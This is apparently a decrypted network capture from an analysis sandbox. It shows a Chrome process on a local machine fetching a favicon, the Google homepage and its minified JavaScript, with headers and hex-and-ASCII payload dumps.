                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 12:18:45 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 05 Oct 2024 12:18:45 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=691200
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Age: 8548
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:13 UTC685INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                                                                                                                                                                                                                          Data Ascii: h& ( 0.v]X:X:rY
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:13 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a
                                                                                                                                                                                                                                                                                          Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:13 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff
                                                                                                                                                                                                                                                                                          Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:13 UTC1390INData Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                          Data Ascii: BBBBBBF!4I
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:13 UTC575INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                          Data Ascii: $'


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          23192.168.2.749760142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC762OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC1763INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:14 GMT
                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Oyt-oYHGJn0kLT6CJ0SrlA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Set-Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; expires=Wed, 26-Mar-2025 14:41:14 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                                                                                          Set-Cookie: NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI; expires=Sat, 29-Mar-2025 14:41:14 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC1763INData Raw: 32 30 35 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 6d 2b 68 68 74 75 68 37 4e 4a 67 75 71 53 6e 58 48 45 41 49 71 71 4d 61 56 2b 47 58 43 6b 73 38 57 59 58 48 4a 4b 46 37 6c 36 41 65 59 4d 6a 2b 77 4f 2b 66 69 39 4f 64 44 71 46 6e 4a 54 67 39 74 30 34 39 32 44 79 6b 56 78 78 34 6a 70 76 46 62 78 6e 41
                                                                                                                                                                                                                                                                                          Data Ascii: 2057<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="Anm+hhtuh7NJguqSnXHEAIqqMaV+GXCks8WYXHJKF7l6AeYMj+wO+fi9OdDqFnJTg9t0492DykVxx4jpvFbxnA
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC1763INData Raw: 28 29 5d 29 3b 66 6f 72 28 63 3d 30 3b 63 3c 66 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 69 66 28 63 3d 3d 3d 30 7c 7c 63 3e 30 29 64 2b 3d 22 26 22 3b 64 2b 3d 66 5b 63 5d 5b 30 5d 2b 22 3d 22 2b 66 5b 63 5d 5b 31 5d 7d 72 65 74 75 72 6e 22 2f 22 2b 28 6b 7c 7c 22 67 65 6e 5f 32 30 34 22 29 2b 22 3f 61 74 79 70 3d 69 26 63 74 3d 22 2b 53 74 72 69 6e 67 28 61 29 2b 22 26 63 61 64 3d 22 2b 28 62 2b 65 2b 64 29 7d 3b 6d 3d 67 6f 6f 67 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 71 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 6b 2c 65 29 7b 65 3d 65 3d 3d
                                                                                                                                                                                                                                                                                          Data Ascii: ()]);for(c=0;c<f.length;c++){if(c===0||c>0)d+="&";d+=f[c][0]+"="+f[c][1]}return"/"+(k||"gen_204")+"?atyp=i&ct="+String(a)+"&cad="+(b+e+d)};m=google.kEI;google.getEI=p;google.getLEI=q;google.ml=function(){return null};google.log=function(a,b,c,d,k,e){e=e==
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC1763INData Raw: 61 6c 73 65 2c 64 6f 69 75 3a 30 2c 66 6c 61 3a 66 61 6c 73 65 2c 66 6c 69 3a 66 61 6c 73 65 2c 67 6c 3a 74 72 75 65 2c 69 72 73 66 3a 66 61 6c 73 65 2c 6c 68 63 3a 66 61 6c 73 65 2c 6d 61 72 62 3a 74 72 75 65 2c 6d 63 63 3a 66 61 6c 73 65 2c 70 63 69 3a 74 72 75 65 2c 72 61 66 3a 66 61 6c 73 65 2c 74 61 66 3a 74 72 75 65 2c 74 69 6d 6c 3a 66 61 6c 73 65 2c 74 70 72 63 3a 66 61 6c 73 65 2c 76 69 73 3a 74 72 75 65 2c 77 68 30 3a 66 61 6c 73 65 2c 77 68 75 3a 66 61 6c 73 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 70 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 7c 7c 7b 7d 3b 76 61 72 20 72 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 77
                                                                                                                                                                                                                                                                                          Data Ascii: alse,doiu:0,fla:false,fli:false,gl:true,irsf:false,lhc:false,marb:true,mcc:false,pci:true,raf:false,taf:true,timl:false,tprc:false,vis:true,wh0:false,whu:false};})();(function(){var p=this||self;window.google=window.google||{};var r=window.performance&&w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC1763INData Raw: 2e 74 69 6d 6c 2c 6e 61 3d 67 6f 6f 67 6c 65 2e 63 2e 77 68 75 2c 6f 61 3d 67 6f 6f 67 6c 65 2e 63 2e 70 63 69 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 74 69 63 6b 28 22 6c 6f 61 64 22 2c 61 2c 62 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 63 2e 65 28 22 6c 6f 61 64 22 2c 61 2c 53 74 72 69 6e 67 28 62 29 29 7d 66 75 6e 63 74 69 6f 6e 20 42 28 61 2c 62 2c 63 2c 64 29 7b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 64 7c 7c 21 31 29 3a 61 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 62 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 61 2c 62 2c 63 2c 64 29 7b 22 61
                                                                                                                                                                                                                                                                                          Data Ascii: .timl,na=google.c.whu,oa=google.c.pci;function z(a,b){google.tick("load",a,b)}function A(a,b){google.c.e("load",a,String(b))}function B(a,b,c,d){a.addEventListener?a.addEventListener(b,c,d||!1):a.attachEvent&&a.attachEvent("on"+b,c)}function C(a,b,c,d){"a
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC1235INData Raw: 69 6d 3d 67 6f 6f 67 6c 65 2e 63 2e 69 69 6d 7c 7c 7b 7d 3b 76 61 72 20 48 3d 67 6f 6f 67 6c 65 2e 63 2e 69 69 6d 2c 71 61 3d 30 3b 66 75 6e 63 74 69 6f 6e 20 49 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 73 69 69 64 22 29 3b 65 7c 7c 28 65 3d 53 74 72 69 6e 67 28 2b 2b 71 61 29 2c 6f 61 26 26 28 65 3d 67 6f 6f 67 6c 65 2e 6b 45 49 2b 22 5f 22 2b 65 29 29 3b 48 5b 65 5d 7c 7c 28 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 73 69 69 64 22 2c 65 29 2c 48 5b 65 5d 3d 62 3f 62 28 61 29 3a 6e 65 77 20 70 61 28 61 2c 63 2c 64 29 29 3b 72 65 74 75 72 6e 20 48 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 4a 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 67
                                                                                                                                                                                                                                                                                          Data Ascii: im=google.c.iim||{};var H=google.c.iim,qa=0;function I(a,b,c,d){var e=a.getAttribute("data-csiid");e||(e=String(++qa),oa&&(e=google.kEI+"_"+e));H[e]||(a.setAttribute("data-csiid",e),H[e]=b?b(a):new pa(a,c,d));return H[e]}function J(a){for(var b=document.g
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC328INData Raw: 31 34 31 0d 0a 22 6c 6f 61 64 22 2c 64 29 3b 43 28 61 2c 22 65 72 72 6f 72 22 2c 64 29 7d 42 28 61 2c 22 6c 6f 61 64 22 2c 64 29 3b 62 26 26 42 28 61 2c 22 65 72 72 6f 72 22 2c 64 29 7d 3b 70 2e 67 6f 6f 67 6c 65 2e 61 66 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 69 6d 6c 22 2c 53 74 72 69 6e 67 28 44 61 74 65 2e 6e 6f 77 28 29 29 29 7d 3b 67 6f 6f 67 6c 65 2e 73 74 61 72 74 54 69 63 6b 28 22 6c 6f 61 64 22 29 3b 67 6f 6f 67 6c 65 2e 74 69 63 6b 28 22 6c 6f 61 64 22 2c 22 68 73 74 22 2c 77 69 6e 64 6f 77 2e 5f 68 73 74 29 3b 76 61 72 20 4c 3d 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 3b 69 66 28 21 67 6f 6f 67 6c 65 2e 73 74 76 73 63 7c 7c 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 73
                                                                                                                                                                                                                                                                                          Data Ascii: 141"load",d);C(a,"error",d)}B(a,"load",d);b&&B(a,"error",d)};p.google.aft=function(a){a.setAttribute("data-iml",String(Date.now()))};google.startTick("load");google.tick("load","hst",window._hst);var L=google.timers.load;if(!google.stvsc||google.stvsc.s
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC1390INData Raw: 38 30 30 30 0d 0a 4c 2e 77 73 72 74 3d 76 2d 74 29 3a 4e 2e 6e 6f 77 26 26 28 4c 2e 77 73 72 74 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 75 28 29 29 29 29 7d 67 6f 6f 67 6c 65 2e 63 2e 62 28 22 78 65 22 2c 22 6c 6f 61 64 22 29 3b 21 77 69 6e 64 6f 77 2e 5f 68 73 74 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 53 65 61 72 63 68 48 65 61 64 53 74 61 72 74 22 29 3b 76 61 72 20 4f 3b 69 66 28 28 4f 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 29 3d 3d 6e 75 6c 6c 3f 30 3a 4f 2e 73 74 61 72 74 29 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 2e 74 2e 73 74 61 72 74 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 73 74 61 72 74 3b 66 75 6e 63 74 69 6f 6e 20 50 28
                                                                                                                                                                                                                                                                                          Data Ascii: 8000L.wsrt=v-t):N.now&&(L.wsrt=Math.floor(u())))}google.c.b("xe","load");!window._hst&&performance&&performance.mark&&performance.mark("SearchHeadStart");var O;if((O=google.stvsc)==null?0:O.start)google.timers.load.t.start=google.stvsc.start;function P(
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC1390INData Raw: 2d 31 7d 0a 66 75 6e 63 74 69 6f 6e 20 55 28 61 29 7b 76 61 72 20 62 3d 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 2c 63 3d 62 2e 6d 3b 69 66 28 21 63 7c 7c 21 63 2e 70 72 73 29 7b 63 3d 77 69 6e 64 6f 77 2e 5f 63 73 63 3d 3d 3d 22 61 67 73 61 22 26 26 77 69 6e 64 6f 77 2e 5f 63 73 68 69 64 3b 76 61 72 20 64 3d 53 28 29 7c 7c 63 3f 30 3a 54 28 22 71 73 75 62 74 73 22 29 3b 64 3e 30 26 26 28 63 3d 54 28 22 66 62 74 73 22 29 2c 63 3e 30 26 26 28 62 2e 74 2e 73 74 61 72 74 3d 4d 61 74 68 2e 6d 61 78 28 64 2c 63 29 29 29 3b 76 61 72 20 65 3d 62 2e 74 2c 68 3d 65 2e 73 74 61 72 74 3b 63 3d 7b 7d 3b 62 2e 77 73 72 74 21 3d 3d 76 6f 69 64 20 30 26 26 28 63 2e 77 73 72 74 3d 62 2e 77 73 72 74 29 3b 69 66 28 68 29 66 6f 72 28 76 61 72 20 6b 3d 30 2c 6d
                                                                                                                                                                                                                                                                                          Data Ascii: -1}function U(a){var b=google.timers.load,c=b.m;if(!c||!c.prs){c=window._csc==="agsa"&&window._cshid;var d=S()||c?0:T("qsubts");d>0&&(c=T("fbts"),c>0&&(b.t.start=Math.max(d,c)));var e=b.t,h=e.start;c={};b.wsrt!==void 0&&(c.wsrt=b.wsrt);if(h)for(var k=0,m
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC1390INData Raw: 7b 68 7c 7c 6b 21 3d 3d 6d 7c 7c 63 28 66 2c 6e 2c 67 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 6c 2c 71 29 7b 6c 3d 4d 61 74 68 2e 6d 61 78 28 66 2c 6c 29 3b 66 21 3d 3d 6c 26 26 28 6e 3d 66 2c 67 3d 71 29 3b 66 3d 6c 3b 2b 2b 6d 3b 64 28 29 7d 76 61 72 20 68 3d 21 30 2c 6b 3d 30 2c 6d 3d 30 2c 6e 3d 30 2c 66 3d 30 2c 67 3b 4a 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 61 28 6c 29 26 26 28 2b 2b 6b 2c 6c 2e 69 7c 7c 6c 2e 41 3f 65 28 6c 2e 69 7c 7c 30 2c 6c 2e 67 29 3a 6c 2e 76 2e 70 75 73 68 28 65 29 29 7d 29 3b 62 28 29 3b 68 3d 21 31 3b 64 28 29 7d 3b 76 61 72 20 57 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 3b 66 75 6e 63 74 69 6f 6e 20 79 61 28 29 7b 69 66 28 67 6f 6f 67 6c 65 2e 63 2e 63 34 74 26 26 57 26 26 57 2e 6d 61 72 6b 26 26 57 2e 74
                                                                                                                                                                                                                                                                                          Data Ascii: {h||k!==m||c(f,n,g)}function e(l,q){l=Math.max(f,l);f!==l&&(n=f,g=q);f=l;++m;d()}var h=!0,k=0,m=0,n=0,f=0,g;J(function(l){a(l)&&(++k,l.i||l.A?e(l.i||0,l.g):l.v.push(e))});b();h=!1;d()};var W=window.performance;function ya(){if(google.c.c4t&&W&&W.mark&&W.t
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:14 UTC1390INData Raw: 6e 63 74 69 6f 6e 20 43 61 28 61 29 7b 61 3d 49 28 61 29 3b 72 65 74 75 72 6e 20 78 26 26 77 7c 7c 6a 61 21 3d 3d 30 3f 46 28 61 29 3a 30 7d 3b 67 6f 6f 67 6c 65 2e 63 2e 77 68 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 3b 67 6f 6f 67 6c 65 2e 63 2e 62 28 22 70 72 74 22 29 3b 76 61 72 20 44 61 3d 66 61 7c 7c 30 3b 69 66 28 44 61 3e 30 29 61 3a 7b 69 66 28 74 21 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 45 61 3d 75 28 29 2c 46 61 3d 44 61 2d 45 61 3b 69 66 28 46 61 3e 30 29 7b 5a 3d 73 65 74 54 69 6d 65 6f 75 74 28 56 2c 46 61 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 2b 45 61 29 29 3b 62 72 65
                                                                                                                                                                                                                                                                                          Data Ascii: nction Ca(a){a=I(a);return x&&w||ja!==0?F(a):0};google.c.wh=Math.floor(window.innerHeight||document.documentElement.clientHeight);google.c.b("prt");var Da=fa||0;if(Da>0)a:{if(t!==void 0){var Ea=u(),Fa=Da-Ea;if(Fa>0){Z=setTimeout(V,Fa,Math.floor(t+Ea));bre


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          24192.168.2.749762142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC1711OUTGET /xjs/_/ss/k=xjs.hd.8JyeNrzotDo.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAAEAAAAAAAAAAoAHYSAACMAAA2ACAAAAAAAAQAAAMAAAAAAEACAAAABMACAAAAAAAEACASAABAEQAAAACBECAAAAEUQAgQgAQIFEEoBAAAAAYAAAgBYIBhAIIKAEYBAgAAAAAAIEAEAAAARQACBADoIRAABgJhAgAgBPQABAAAAIAAAAJAAAAYAANkAAIAAAAAAADIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAQAEAAAAAAAAAAAAAAAAAAAAE/d=1/ed=1/br=1/rs=ACT90oGeXue4vCo29BBNLxd3Hctkci5Jig/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl HTTP/1.1
